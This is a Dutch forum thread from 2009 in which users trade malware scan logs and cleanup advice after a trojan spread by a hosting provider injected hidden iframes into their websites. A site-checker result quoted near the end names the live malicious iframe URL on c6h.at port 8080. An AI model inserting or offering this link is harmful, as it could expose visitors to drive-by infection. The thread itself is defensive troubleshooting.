    Ja, oké. Je bent nu toch bezig. Maar kijk nu even hoeveel tijd, hoeveel beveiligingsprogramma's later en hoeveel andere personen je hebt moeten op trommelen om het probleem te verhelpen.. Eigenlijk is het toch gewoon te gek voor woorden?
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:48:50 #221
    79166 Qwea
    #teampindakaas #viesdik
    pi_71795093
    ik kan geen search files vinden van IE.

    Wat is dit eigk?

    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 17:49:14 #222
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71795099
    Overigens ben ik er vandoor, ik lees het vannacht wel allemaal wel weer.. suc-6 iig..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:49:25 #223
    79166 Qwea
    #teampindakaas #viesdik
    pi_71795102
    quote:
    Op dinsdag 11 augustus 2009 17:44 schreef Mr.Noodle het volgende:

    [..]

    Nee, die staan in je Windows Map. Gewoon even zoeken in Windows aanklikken en zoeken op "hosts". Dat zijn als het goed is tekstbestandjes die gebruikt worden door je browsers om te linken naar bepaalde sites. Soms staan daar ook dingen in die niet helemaal te vertrouwen zijn, bijvoorbeeld een link naar een IP-adres van een website met dezelfde spyware/malware.

    Dat zou dus betekenen dat google.com indirect weer naar die vage link leidt.
    *gaat zoeken in C : windows
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 17:52:01 #224
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71795160
    quote:
    Op dinsdag 11 augustus 2009 17:48 schreef Qwea het volgende:
    ik kan geen search files vinden van IE.

    Wat is dit eigk?

    [ afbeelding ]
    Dat is je profiel van Firefox waar al je history, settings in wordt opgeslagen. Het kan geïnfecteerd zijn, maar vaak is het een standaardonderdeel van Firefox. Dat die map zo raar heet is niet erg in dit geval. Is bij mijn Windows machine ook.

    "SearchUrl" is overigens wel handig om die nog even te controleren in het register, net een paar keys erboven. Daar staan volgens mij alle urls van je zoekmachine van je browser in.
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:52:13 #225
    79166 Qwea
    #teampindakaas #viesdik
    pi_71795164
    zoeken in de windows search op hosts levert geen bestanden op
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 17:52:44 #226
    79166 Qwea
    #teampindakaas #viesdik
    pi_71795176
    quote:
    Op dinsdag 11 augustus 2009 17:52 schreef Mr.Noodle het volgende:

    [..]

    Dat is je profiel van Firefox waar al je history, settings in wordt opgeslagen. Het kan geïnfecteerd zijn, maar vaak is het een standaardonderdeel van Firefox. Dat die map zo raar heet is niet erg in dit geval. Is bij mijn Windows machine ook.
    aah

    wel tof trouwens, je hulp
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 17:59:40 #227
    111829 MissBliss
    Godin van SHO
    pi_71795299
    quote:
    Op dinsdag 11 augustus 2009 @ 17:46 schreef Mr.Noodle het volgende:

    [..]

    Ja, oké. Je bent nu toch bezig. Maar kijk nu even hoeveel tijd, hoeveel beveiligingsprogramma's later en hoeveel andere personen je hebt moeten op trommelen om het probleem te verhelpen.. Eigenlijk is het toch gewoon te gek voor woorden?
    Ja oke, maar een format C kost ook een berg tijd en moeite hoor! Eerst het backuppen en daarna weer alles terugzetten en programma's opnieuw installeren enzo.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 18:06:16 #228
    111829 MissBliss
    Godin van SHO
    pi_71795448
    Dinges is klaar!

    Hier de log:
    quote:
    Malwarebytes' Anti-Malware 1.40
    Database versie: 2601
    Windows 5.1.2600 Service Pack 3

    11-8-2009 18:06:36
    mbam-log-2009-08-11 (18-06-36).txt

    Scan type: Volledige Scan (C:\|J:\|)
    Objecten gescand: 261566
    Verstreken tijd: 1 hour(s), 19 minute(s), 38 second(s)

    Geheugenprocessen geïnfecteerd: 0
    Geheugenmodulen geïnfecteerd: 0
    Registersleutels geïnfecteerd: 4
    Registerwaarden geïnfecteerd: 6
    Registerdata bestanden geïnfecteerd: 0
    Mappen geïnfecteerd: 1
    Bestanden geïnfecteerd: 5

    Geheugenprocessen geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Geheugenmodulen geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Registersleutels geïnfecteerd:
    HKEY_CLASSES_ROOT\wvfsrqab.bbwl (Trojan.FakeAlert) -> Quarantined and deleted successfully.
    HKEY_CLASSES_ROOT\wvfsrqab.toolbar.1 (Trojan.FakeAlert) -> Quarantined and deleted successfully.
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Bind (Malware.Trace) -> Quarantined and deleted successfully.
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VSPlugin (Trojan.FakeAlert) -> Quarantined and deleted successfully.

    Registerwaarden geïnfecteerd:
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Extensions\CmdMapping\{c5428486-50a0-4a02-9d20-520b59a9f9b2} (Adware.Shopping.Report) -> Quarantined and deleted successfully.
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Extensions\CmdMapping\{c5428486-50a0-4a02-9d20-520b59a9f9b3} (Adware.Shopping.Report) -> Quarantined and deleted successfully.
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\bf (Trojan.Agent) -> Quarantined and deleted successfully.
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\bk (Trojan.Agent) -> Quarantined and deleted successfully.
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\iu (Trojan.Agent) -> Quarantined and deleted successfully.
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\mu (Trojan.Agent) -> Quarantined and deleted successfully.

    Registerdata bestanden geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Mappen geïnfecteerd:
    C:\WINDOWS1\system32\LocalService32 (Worm.Archive) -> Quarantined and deleted successfully.

    Bestanden geïnfecteerd:
    C:\Documents and Settings\user.USER-70FB3322FA\Local Settings\Temp\~TM69.tmp (Trojan.Agent) -> Quarantined and deleted successfully.
    C:\Documents and Settings\user.USER-70FB3322FA\Menu Start\Programma's\Opstarten\ikowin32.exe (Trojan.Agent) -> Quarantined and deleted successfully.
    C:\WINDOWS1\system32\LocalService32\29.tmp (Worm.Archive) -> Quarantined and deleted successfully.
    C:\Documents and Settings\user.USER-70FB3322FA\Application Data\wiaserva.log (Malware.Trace) -> Quarantined and deleted successfully.
    C:\WINDOWS1\Temp\wpv441249365049.exe (Trojan.Agent) -> Quarantined and deleted successfully.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 18:26:47 #229
    79166 Qwea
    #teampindakaas #viesdik
    pi_71795975
    belangrijke vraag ; ik heb een recovery van samsung terug gezet vanaf het moment (6aug) dat ik hem kreeg. Hij heeft alle bestanden op C gewist, en de gegevens die op 6aug gemaakt zijn terug gezet. Ik hoefde alleen geen windows te installeren... kan ik er nu wel of niet vanuit gaan dattie weg is?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 18:40:04 #230
    111829 MissBliss
    Godin van SHO
    pi_71796307
    Qwea, zie jij nog iets interessants in het log hierboven? Als in: gefeliciteerd MB, het virus is nu weg!

    IE doet overigens niks raars hier
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 18:44:05 #231
    79166 Qwea
    #teampindakaas #viesdik
    pi_71796396
    alles wat ie gevonden heeft, is gedelete. Ik zou hem voor de zekerheid opnieuw opstarten en nog eens runnen.

    Mijn windows is al 7 minuten bezig met aflsuiten
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71796473
    PC extreme gebeld. Ze zijn dus al langer bekend met het virus, maar komen er maar niet achter waar hij bij hun psies vandaan komt. De collega die dit behandeld belt mij morgenochtend om 9 uur terug

    Ik ga het echt niet zelf oplossen he, ze geven nu gewoon toe dat ze wel degelijk het probleem vormen in ons geval, MB!
      dinsdag 11 augustus 2009 @ 18:49:01 #233
    111829 MissBliss
    Godin van SHO
    pi_71796505
    quote:
    Op dinsdag 11 augustus 2009 @ 18:47 schreef An24 het volgende:
    PC extreme gebeld. Ze zijn dus al langer belend met het virus, maar komen er maar niet achter waar hij bij hun psies vandaan komt. De collega die dit behandeld belt mij morgenochtend om 9 uur terug

    Ik ga het echt niet zelf oplossen he, ze geven nu gewoon toe dat ze wel degelijk het probleem vormen in ons geval, MB!

    Nou, lekker dan

    Ik ben benieuwd naar wat ie je morgen te zeggen heeft!
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 18:53:07 #234
    111829 MissBliss
    Godin van SHO
    pi_71796607
    Heb je de helpdesk a 45ct per minuut gebeld? Want nu wil ik ze ook bellen.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      FOK!fotograaf dinsdag 11 augustus 2009 @ 18:59:18 #235
    18921 freud
    Who's John Galt?
    pi_71796775
    Het is ook best triest van PCExtreme... Zocht even snel online, en er zijn veel mensen met klachten. Lokaal bij An24 geen virussen (gescand met meerdere scanners), en alleen de bestanden aan de kant van PCE zijn veranderd. Zeer slecht dat ze uberhaupt geinfecteerd zijn, en nog triester dat ze blijkbaar wintel servers hebben (en geen *UX).

    Je kan van ook redelijk snel zoeken op dit virus. In windows de drive selecteren met rechts waar je html/php bestanden staan. Kies dan 'search' (of zoeken). In het bovenste invoerveld voer je dan in *.php, *.htm* in, en in het veld eronder .in:8080. Dan op search/zoeken klikken, en je krijgt alle files te zien waar de iframe is ingevoegd.

    Het weghalen van deze code moet je natuurlijk pas doen als de veroorzaker van je pc af is. Je kan dan met zoeken en vervangen dit weghalen. Ik heb zelf met Crimson Editor dit gedaan, omdat je dan in alle bestanden het in een keer kan doen (ok, in batches van 500 files tegelijk).

    Maar goed, ik zou een goeie claim neerleggen bij PCExtreme...
    Ik nuf je seuk!
    Ik hier?
    If it's free, you're the product!
      dinsdag 11 augustus 2009 @ 19:03:05 #236
    79166 Qwea
    #teampindakaas #viesdik
    pi_71796873
    in mijn samsung recovery solution staat dus als je volledig herstel doet ;

    Overschrijft station C: volledig met een backup image om de computer volledige in de eerdere toestand terug te brengen.

    Dan is dat toch goed genoeg? Want 6aug was er niks aan de hand

    Nog ff in safe mode alles draaien voor de zekerheid
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 19:04:26 #237
    111829 MissBliss
    Godin van SHO
    pi_71796912
    quote:
    Op dinsdag 11 augustus 2009 @ 18:53 schreef MissBliss het volgende:
    Heb je de helpdesk a 45ct per minuut gebeld? Want nu wil ik ze ook bellen.
    Ik heb ze gebeld, tegen mij zijn ze nog in de ontkenningsfase
    Ik moet iig mailen en ze gaan aan de slag ofzo.
    quote:
    Op dinsdag 11 augustus 2009 @ 18:59 schreef freud het volgende:
    Het is ook best triest van PCExtreme... Zocht even snel online, en er zijn veel mensen met klachten. Lokaal bij An24 geen virussen (gescand met meerdere scanners), en alleen de bestanden aan de kant van PCE zijn veranderd. Zeer slecht dat ze uberhaupt geinfecteerd zijn, en nog triester dat ze blijkbaar wintel servers hebben (en geen *UX).

    Je kan van ook redelijk snel zoeken op dit virus. In windows de drive selecteren met rechts waar je html/php bestanden staan. Kies dan 'search' (of zoeken). In het bovenste invoerveld voer je dan in *.php, *.htm* in, en in het veld eronder .in:8080. Dan op search/zoeken klikken, en je krijgt alle files te zien waar de iframe is ingevoegd.

    Het weghalen van deze code moet je natuurlijk pas doen als de veroorzaker van je pc af is. Je kan dan met zoeken en vervangen dit weghalen. Ik heb zelf met Crimson Editor dit gedaan, omdat je dan in alle bestanden het in een keer kan doen (ok, in batches van 500 files tegelijk).

    Maar goed, ik zou een goeie claim neerleggen bij PCExtreme...
    Oh, dat ga ik proberen!
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 19:16:52 #238
    111829 MissBliss
    Godin van SHO
    pi_71797268
    quote:
    Op dinsdag 11 augustus 2009 @ 18:59 schreef freud het volgende:
    *verhaal*
    Niks gevonden!
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 19:27:29 #239
    192696 CantFazeMe
    Scroll my bar
    pi_71797604
    Sorry dat ik zo snel weg was. Had een etentje.

    Maar @MissBliss, je hebt al gescant naar een reboot? Trojan.Agent heeft namelijk het patroon om ook na een reboot terug te komen.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 19:32:38 #240
    111829 MissBliss
    Godin van SHO
    pi_71797733
    Nu bezig met een scan na reboot.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 19:33:34 #241
    79166 Qwea
    #teampindakaas #viesdik
    pi_71797763
    quote:
    Op dinsdag 11 augustus 2009 19:27 schreef CantFazeMe het volgende:
    Sorry dat ik zo snel weg was. Had een etentje.

    Maar @MissBliss, je hebt al gescant naar een reboot? Trojan.Agent heeft namelijk het patroon om ook na een reboot terug te komen.
    Wat vindt jij van die volledig herstel van mij?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 19:34:18 #242
    79166 Qwea
    #teampindakaas #viesdik
    pi_71797781
    quote:
    Op dinsdag 11 augustus 2009 19:32 schreef MissBliss het volgende:
    Nu bezig met een scan na reboot.
    Same here, maar dan ook na een volledig herstel
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 19:36:05 #243
    192696 CantFazeMe
    Scroll my bar
    pi_71797826
    quote:
    Op dinsdag 11 augustus 2009 19:33 schreef Qwea het volgende:

    [..]

    Wat vindt jij van die volledig herstel van mij?
    Ik vind het raar dat ie er opeens niet meer is. Maar de worm infecteert dus zich via netwerken en malwarebytes gaf bij jouw 0 infecties aan. Dus ik ga ervan uit dat het goed is. Je kunt ook e.v. Combofix gebruiken maar die vind ik erg risicovol.

    Edit: ja, je heb in feite inderdaad een "image" van je computer terug gezet vóór de infectie. Dat is altijd ook goed mogelijk. Zolang je maar controleert.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 19:37:36 #244
    79166 Qwea
    #teampindakaas #viesdik
    pi_71797856
    quote:
    Op dinsdag 11 augustus 2009 19:36 schreef CantFazeMe het volgende:

    [..]

    Ik vind het raar dat ie er opeens niet meer is. Maar de worm infecteert dus zich via netwerken en malwarebytes gaf bij jouw 0 infecties aan. Dus ik ga ervan uit dat het goed is. Je kunt ook e.v. Combofix gebruiken maar die vind ik erg risicovol.
    Nou, avast gaf aan dat er een virus was, zie screenshot. Maar toen ik scande met avast, adaware, hijackthis, superantivirus en malware bytes, was er niks te vinden. En ook in het register vond ik niks.

    Logje van nu ;
    quote:
    Malwarebytes' Anti-Malware 1.40
    Database versie: 2605
    Windows 6.0.6001 Service Pack 1 (Safe Mode)

    11-8-2009 19:35:50
    mbam-log-2009-08-11 (19-35-50).txt

    Scan type: Volledige Scan (C:\|D:\|F:\|)
    Objecten gescand: 186398
    Verstreken tijd: 24 minute(s), 54 second(s)

    Geheugenprocessen geïnfecteerd: 0
    Geheugenmodulen geïnfecteerd: 0
    Registersleutels geïnfecteerd: 0
    Registerwaarden geïnfecteerd: 0
    Registerdata bestanden geïnfecteerd: 0
    Mappen geïnfecteerd: 0
    Bestanden geïnfecteerd: 0

    Geheugenprocessen geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Geheugenmodulen geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Registersleutels geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Registerwaarden geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Registerdata bestanden geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Mappen geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Bestanden geïnfecteerd:
    (Geen kwaadaardige items gevonden)
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 19:38:18 #245
    192696 CantFazeMe
    Scroll my bar
    pi_71797874
    Dit is combofix voor de geïnteresseerden. Ik gebruik het niet, maar goed hier is een guide. Het is op eigen risico.

    http://www.bleepingcomputer.com/combofix/how-to-use-combofix
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 19:38:46 #246
    79166 Qwea
    #teampindakaas #viesdik
    pi_71797882
    wat is combofix trouwens?

    Ooh en avast doet nu voordat windows opgestart is een scan
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 19:39:33 #247
    192696 CantFazeMe
    Scroll my bar
    pi_71797902
    quote:
    Op dinsdag 11 augustus 2009 19:37 schreef Qwea het volgende:

    [..]

    Nou, avast gaf aan dat er een virus was, zie screenshot. Maar toen ik scande met avast, adaware, hijackthis, superantivirus en malware bytes, was er niks te vinden. En ook in het register vond ik niks.

    Logje van nu ;
    [..]


    Dat zit wel goed!
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 19:40:58 #248
    192696 CantFazeMe
    Scroll my bar
    pi_71797938
    quote:
    Op dinsdag 11 augustus 2009 19:38 schreef Qwea het volgende:
    wat is combofix trouwens?

    Ooh en avast doet nu voordat windows opgestart is een scan
    Combofix is ook een soort Malwarebytes, maar het is alleen in een CMD bestand. Ik vind het risicovol, want hij wijzigt ook je systeem tijdelijk tijdens de scan. Na de scan als je hem verwijderd wordt alles wel normaal. (je moet zelf nog wel wat aanpassen maar goed.) Ik gebruik het alleen als een laatste redmiddel.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 19:42:01 #249
    192696 CantFazeMe
    Scroll my bar
    pi_71797968
    En ik raad je het niet aan om aan te beginnen als je er niks van af weet.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 19:43:18 #250
    79166 Qwea
    #teampindakaas #viesdik
    pi_71798000
    quote:
    Op dinsdag 11 augustus 2009 19:42 schreef CantFazeMe het volgende:
    En ik raad je het niet aan om aan te beginnen als je er niks van af weet.
    *netjes afblijft

    *wacht totdat avast eindelijk eens klaar is. Hij is pas op 1%
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 19:43:44 #251
    79166 Qwea
    #teampindakaas #viesdik
    pi_71798007
    werkelijk, als het zo'n tering gedoe is om het te verwijderen, betreur ik de bedrijven die ermee besmet zijn
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      FOK!fotograaf dinsdag 11 augustus 2009 @ 20:46:38 #252
    18921 freud
    Who's John Galt?
    pi_71799962
    Het is trouwens ook wel aan te bevelen om na het scannen met je eigen virusscanner, nog een andere te draaien. Symantec en mcafee bieden online scanners aan. Is wel aan te raden om die ook nog eroverheen te gooien, just in case.
    Ik nuf je seuk!
    Ik hier?
    If it's free, you're the product!
      dinsdag 11 augustus 2009 @ 20:48:53 #253
    79166 Qwea
    #teampindakaas #viesdik
    pi_71800040
    quote:
    Op dinsdag 11 augustus 2009 20:46 schreef freud het volgende:
    Het is trouwens ook wel aan te bevelen om na het scannen met je eigen virusscanner, nog een andere te draaien. Symantec en mcafee bieden online scanners aan. Is wel aan te raden om die ook nog eroverheen te gooien, just in case.
    Ik wilde online scannen van trend micro.. maar dat ding doet het hierzo niet hij laad niet echt door tot in het scan proces. Ik moet de voorwaarden accepten en dan blijft ie maar laden maar doettie weinig
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 20:49:29 #254
    79166 Qwea
    #teampindakaas #viesdik
    pi_71800063
    en symantec = o.a norton en mcafee bleken volgens vele site's compleet clueless voor het virus... dus waarom zouden die hem dan wel online detecteren?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 20:51:19 #255
    79166 Qwea
    #teampindakaas #viesdik
    pi_71800133
    trouwens MB ; ding al klaar? nog wat gevonden?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 20:52:58 #256
    111829 MissBliss
    Godin van SHO
    pi_71800197
    quote:
    Op dinsdag 11 augustus 2009 @ 20:51 schreef Qwea het volgende:
    trouwens MB ; ding al klaar? nog wat gevonden?
    Ja, klaar en niks gevonden

    Misschien zet ik zo avast nog maar een keer aan
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 21:02:01 #257
    79166 Qwea
    #teampindakaas #viesdik
    pi_71800528
    quote:
    Op dinsdag 11 augustus 2009 20:52 schreef MissBliss het volgende:

    [..]

    Ja, klaar en niks gevonden

    Misschien zet ik zo avast nog maar een keer aan
    nice!
    Ze zijn in de SC ook allemaal aant scannen omdat ze op je site zijn geweest
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 21:04:14 #258
    111829 MissBliss
    Godin van SHO
    pi_71800596
    Ja, ik had zelfs gevraagd: goh, doet mijn site ook raar bij jullie?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 21:06:37 #259
    79166 Qwea
    #teampindakaas #viesdik
    pi_71800684
    quote:
    Op dinsdag 11 augustus 2009 21:04 schreef MissBliss het volgende:
    Ja, ik had zelfs gevraagd: goh, doet mijn site ook raar bij jullie?
    ik heb greys ook maar een PM gedaan
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 23:34:20 #260
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71805492
    Eindelijk opgelost dus?
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 23:37:16 #261
    79166 Qwea
    #teampindakaas #viesdik
    pi_71805569
    quote:
    Op dinsdag 11 augustus 2009 23:34 schreef Mr.Noodle het volgende:
    Eindelijk opgelost dus?
    Hier wel lijkt het. Image van de dag dat ik de laptop kreeg (6 aug) terug gezet... en volgens de buurman en mistermaniac is dat voldoende omdat ook de reg sleutels worden overschreven.

    Toen in safemode maleware bytes gedraait, niks gevonden. Toen voor het opstarten in windows avast laten runnen, niks gevonden.

    Moet enkel nog de online scan van trend micro doen, maar dat doek morgen wel.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 23:49:11 #262
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71805917
    Meestal is een image terugzetten al genoeg. Dat is zowat hetzelfde als een format, alles wordt overschreven. Dat zit verder goed.

    MissBliss zou in principe nu ook schadevrij moeten zijn als er niks meer is gevonden door Malwarebytes' na een reboot. Maar goed, de kans dat zij nog sporen heeft iets groter omdat ze het register en het bestandssysteem niet overschreven heeft.

    Rest alleen nog de websites, zoals ik al eerder zij, http://unmaskparasites.com/ om je website te checken op malicious code, mocht dat zo zijn nog even de stappen volgen die ik een aantal pagina's geleden had gepost. Als het goed is kan een hostingprovider gewoon dat scriptje loslaten op al hun websites..

    Net nog even gecheckt, de website van MissBliss is nog steeds "Suspicious"
    Die hidden link "http://c6h.at:8080/ts/in.cgi?pepsi138" (overigens niet op klikken) is er nog steeds..

    [ Bericht 0% gewijzigd door Mr.Noodle op 11-08-2009 23:54:36 ]
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 23:53:04 #263
    79166 Qwea
    #teampindakaas #viesdik
    pi_71806044
    quote:
    Op dinsdag 11 augustus 2009 23:49 schreef Mr.Noodle het volgende:
    Meestal is een image terugzetten al genoeg. Dat is zowat hetzelfde als een format, alles wordt overschreven. Dat zit verder goed.

    MissBliss zou in principe nu ook schadevrij moeten zijn als er niks meer is gevonden door Malwarebytes' na een reboot. Maar goed, de kans dat zij nog sporen heeft iets groter omdat ze het register en het bestandssysteem niet overschreven heeft.

    Rest alleen nog de websites, zoals ik al eerder zij, http://unmaskparasites.com/ om je website te checken op malicious code, mocht dat zo zijn nog even de stappen volgen die ik een aantal pagina's geleden had gepost. Als het goed is kan een hostingprovider gewoon dat scriptje loslaten op al hun websites..
    Ik zal mijn website eens bekieken
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 23:53:57 #264
    79166 Qwea
    #teampindakaas #viesdik
    pi_71806068
    External References
    No external references found.


    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 23:54:41 #265
    111829 MissBliss
    Godin van SHO
    pi_71806078
    quote:
    Op dinsdag 11 augustus 2009 @ 23:49 schreef Mr.Noodle het volgende:
    Meestal is een image terugzetten al genoeg. Dat is zowat hetzelfde als een format, alles wordt overschreven. Dat zit verder goed.

    MissBliss zou in principe nu ook schadevrij moeten zijn als er niks meer is gevonden door Malwarebytes' na een reboot. Maar goed, de kans dat zij nog sporen heeft iets groter omdat ze het register en het bestandssysteem niet overschreven heeft.

    Rest alleen nog de websites, zoals ik al eerder zij, http://unmaskparasites.com/ om je website te checken op malicious code, mocht dat zo zijn nog even de stappen volgen die ik een aantal pagina's geleden had gepost. Als het goed is kan een hostingprovider gewoon dat scriptje loslaten op al hun websites..
    Dizer gaat mijn website opnieuw online zetten en mijn ww veranderen. Ik laat hem dit wel even lezen!

    Je hebt ge-edit: nee klopt, mijn site heb ik niks meer aan gedaan sinds gisteren, dus het virus zit daar nog steeds in!
    Dizer moet hem offline halen en opnieuw uploaden
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 23:54:55 #266
    79166 Qwea
    #teampindakaas #viesdik
    pi_71806086
    MissBliss je website ; This page seems to be <suspicious>

    * <IFrame> hidden link - http://c6h.at:8080/ts/in.cgi?pepsi138


    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 23:56:22 #267
    111829 MissBliss
    Godin van SHO
    pi_71806135
    Klopt, zie post boven je!
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 23:58:02 #268
    79166 Qwea
    #teampindakaas #viesdik
    pi_71806173
    seen
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      FOK!fotograaf woensdag 12 augustus 2009 @ 21:23:21 #269
    18921 freud
    Who's John Galt?
    pi_71830706
    Goeie site, je kan alleen niet zien in welke pagina de link zit
    Ik nuf je seuk!
    Ik hier?
    If it's free, you're the product!
    pi_71834930
    Ik heb nu zelf ongeveer 15 van dit soort klanten gehad (ISP)

    Zoals ik eerder al vermelde, zorg eerst dat je eigen pc schoon is! Pleur je FTP programma er even af en draai verschillende virusprogramma's + spyware scanners.

    Daarna laat je eerst (of doe je zelf) je wachtwoorden wijzigen.. Deze zijn namelijk nu bekend bij het desbetreffende virus.. In de tussentijd laat je iemand wiens PC wél clean is even het iframe verwijderen.

    This should do...
      woensdag 12 augustus 2009 @ 23:17:23 #271
    79166 Qwea
    #teampindakaas #viesdik
    pi_71834981
    quote:
    Op woensdag 12 augustus 2009 23:15 schreef St4ck3r het volgende:
    Ik heb nu zelf ongeveer 15 van dit soort klanten gehad (ISP)

